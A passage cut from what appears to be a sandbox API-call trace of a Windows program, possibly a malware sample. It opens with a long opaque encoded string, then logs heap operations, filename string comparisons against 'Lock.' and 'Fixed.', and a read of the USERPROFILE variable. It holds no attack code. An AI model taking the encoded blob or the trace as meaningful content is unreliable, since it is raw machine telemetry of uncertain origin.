lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.555] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0211.555] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.555] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ul6W7nkKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l6W7nkKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6W7nkKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W7nkKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7nkKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nkKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kKmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kmk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mk8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vcoms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="coms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ms6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0211.557] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa65a0 [0211.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0211.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ul6W7nkKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l6W7nkKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6W7nkKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W7nkKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7nkKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nkKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kKmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kmk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mk8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vcoms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="coms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ms6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6H.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6300 [0211.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0211.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0211.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.559] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.559] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0211.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.560] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0211.561] HeapFree (in: 